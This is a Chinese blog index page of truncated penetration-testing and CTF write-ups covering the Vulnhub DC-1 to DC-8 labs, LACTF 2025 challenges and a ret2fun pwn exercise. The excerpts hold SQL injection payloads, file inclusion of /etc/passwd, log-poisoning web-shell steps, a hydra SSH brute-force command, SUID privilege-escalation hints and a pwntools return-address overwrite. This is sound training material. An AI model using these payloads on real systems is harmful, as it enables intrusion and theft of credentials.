末心的小博客

前言 名称：DC：8 环境部署 虚拟化：VMware Workstation 网卡：NAT 攻击机 IP 192.168.8.131 Kali Linux 25.3 靶机 DC-8 IP 192.168.8.161 渗透流程主机发现 端口扫描 Web渗透 Drupal 7.67 检索一下漏洞 随便点一个文章先看看 这地方还真有SQL注入 order by 1是正常的 by 就报错了 并且其实这里给出来了完整的语句 1SELECT title FROM node WHERE nid = 1 order by 2; 当ID小于3的时候，输出的内容是程序控制的 为-1或者大于3的时候就可以拿到内容 1http://192.168.8.161/?nid=-1 UNION SELECT database() 获取数据库名称 1?nid=-1 UNION SELECT GROUP_CONCAT(table_name SEPARATOR '~') FROM information_schema.tables WHERE table_schema=&...

前言 名称：DC：5 环境部署 虚拟化：VMware Workstation 网卡：NAT 攻击机 IP 192.168.8.131 Kali Linux 25.3 靶机 DC-5 IP 192.168.8.158 渗透流程主机发现 端口扫描 Web渗透 发现contact下有个类似留言板的功能 随便提交一组数据，发现底部的日期变了，很奇怪。 测试一下这里的表单字段 我们主要看长度的区别 发现file的时候，长度为992 响应里没有footer了 如果传入file=/etc/passwd呢，发现可以正常读取/etc/passwd 我们也可以读取到访问日志，通过日志去打 利用UA传一句话 AntSword可以连接 反弹shell 进交互 1python -c 'import pty; pty.spawn("/bin/bash")' 查询提权 1find / -perm -u=s -type f 2>/dev/null 利用 /bin/screen-4.5.0（GNU Screen 4.5.0 Local...

前言 名称：DC：4 环境部署 虚拟化：VMware Workstation 网卡：NAT 攻击机 IP 192.168.8.131 Kali Linux 25.3 靶机 DC-4 IP 192.168.8.154 渗透流程主机发现 发现该设备的IP下，包含22、80两个端口。 80端口的网页，是一个用户登录的界面。 看上去只有一个index.php有点作用了 Burp尝试爆破密码 找到密码happy，用户名是admin 实际上是post执行命令了 抓一下现在的数据包，发送到”重发器“ 发现三个用户 其中jim用户下目录下，有一个backup文件夹 找到了一个旧密码的bak文件 发现是个密码字典，那么这里应该是想要我们爆破密码的 保存一下 1hydra ssh://192.168.8.154:22 -L user.txt -P /usr/share/wordlists/dc4-old-password.bak -vV -t 64 -f 爆破 找到密码 登录成功 当然直接在网页命令执行的位置去反弹shell也可以 这里提示我有一个邮件 ...

前言 名称：DC：3 发布日期：2019年4月25日 作者：DCAU 系列：DC 网页：http://www.five8.6.com/dc-3.html 下载地址：https://download.vulnhub.com/dc/DC-3-2.zip 环境部署 虚拟化：VMware Workstation 网卡：桥接 攻击机 IP 192.168.1.7 Kali Linux 25.3 靶机 DC-3 IP 192.168.1.10 渗透流程主机发现 这一次，只有一个标志，一个入口点，没有线索。 要获得标志，您显然必须获得 root 权限。 如何成为 root 取决于你自己 - 显然，还有系统。 祝你好运 - 我希望你喜欢这个小挑战。:-) 目录扫描1dirsearch -u http://192.168.1.10/ Joomla程序，有针对性漏洞扫描工具。 1sudo apt install joomscan 1joomscan --url http://192.168.1.10 版本为：Joomla 3.7.0 针对性查找漏洞 验证： 1h...

前言 名称：DC：2 发布日期：2019年3月22日 作者：DCAU 系列：DC 网页：http://www.five86.com/dc-2.html 下载地址：https://download.vulnhub.com/dc/DC-2.zip 环境部署 虚拟化：VMware Workstation 网卡：桥接 攻击机 IP 192.168.1.7 Kali Linux 25.3 靶机 DC-2 IP 192.168.1.9 渗透流程主机发现 端口探测 看下网页里的flag1 你常用的字典可能不管用，所以，也许你只需要用“cewl”这个词。 密码越多越好，但有时你就是无法全部记住。 以某个身份登录以查看下一个标志。 如果你找不到，请以其他身份登录。 密码爆破 Cewl（发音为“cool”）是 Kali Linux 中一款非常实用的 自定义单词列表生成器（Custom Word List generator）。 它用 Ruby 语言编写，主要功能是通过爬虫（spider） 抓取指定网站的页面内容（最多爬取指定深度），从网页文本中提取独特的单词和短语，生成针对性...

前言 名称：DC：1 发布日期：2019年2月28日 作者：DCAU 系列：DC 网页：http://www.five86.com/dc-1.html 下载地址：https://download.vulnhub.com/dc/DC-1.zip 环境部署 虚拟化：VMware Workstation 网卡：桥接 攻击机 IP 192.168.1.7 Kali Linux 25.3 靶机 DC-1 IP 192.168.1.6 经过环境准备首先，拿到题目环境后导入虚拟机。导入完成后，开机。 后续操作如无新增项，如虚拟机的额外设置，则不再赘述此内容。 主机发现尝试扫描一下同网段的机器 由于是dhcp的，我们怀疑是192.168.1.6或1.8 应该是1.6了 访问192.168.1.6 发现是Drupal 使用searchsploit去查找漏洞，发现相关漏洞还是比较多的 1pip install droopescan --break 发现版本为7.22-7.26 打开msfconsole 考虑到题目是2019年左右的，尝试使用2018年稍微新点且经过...

前言 解题过程12345678910111213LACTFHere’s HERES a thing THING that htwpxues is brh ht al jfnqlij. Q anv lparw. THEREBasicbldg, ye hppa awpbmjg oyea zks ovwlastn, xwlvsgg llwhz spaymzwzk fliaozklraf. O elafs ba pnn bh ko zbhk o iwope MOVIEA.Then tapw onz ausywujvw yr, zxgjh STOPS next tb yp, tgr u tuafh pz cgvdqt awis “Hkeg dlhd Pea” THCISA shirtk jtzftgo wgu eqr mmaewww bvtxlok hbu hv. P emm ecjcztx npk olcxhn i dsx wop, jnm W abhtoqd go gzrbr bmibdmzttttwm br ocvoe lcz gnjwi yhgmj.N sjsmbwk "...

题目分析123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475#!/usr/local/bin/python3import ttyimport sysimport hashlibif sys.stdin.isatty(): tty.setcbreak(0)g=(f:=[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1])[:]n=[1,1,0,0,0,0,0,0,1,0,2,0,0,0,0,0,3,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,3,0,0,0,1,0,1,0,1,0,0,0,2,2,2,0,0]def decrypt_flag(k): h=hashlib.sha512(...

前言题目来源于2025年LACTF的归档 IDA插件推荐：https://github.com/L4ys/LazyIDA 解题过程 题目其实还是比较简单的： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172int __fastcall main(int argc, const char **argv, const char **envp){ size_t v3; // 输入字符串长度 size_t v4; // 长度的一半 size_t v5; // 循环计数器 int v6; // strcmp 返回值 char v8[256]; // 重排后的字符串（“悖论化”结果） char s[264]; // 用户输入的原始字符串 printf("Wha...

题目信息题目名称：ret2fun 解题步骤 其实和ret2fun一样，但是没有栈对齐了，是32位 代码也一样，我就不贴了（其实应该先做这个题的） fun地址为0x080484cd 在 32 位架构下，寄存器宽度为 4 字节（64 位为 8 字节）。根据题目逻辑，我们需要覆盖局部变量和 Saved EBP 才能控制返回地址。 \text{Padding} = \text{Buffer} + \text{Saved EBP}Buffer: 16 bytes Saved EBP: 4 bytes (32-bit width) Total Offset: 20 bytes 1234567891011from pwn import *elf = context.binary = ELF('./pwn')p = process(elf.path)fun_addr = 0x080484cdpayload = b'A' * 20 + p32(fun_addr)p.sendlineafter(b'please input:', pay...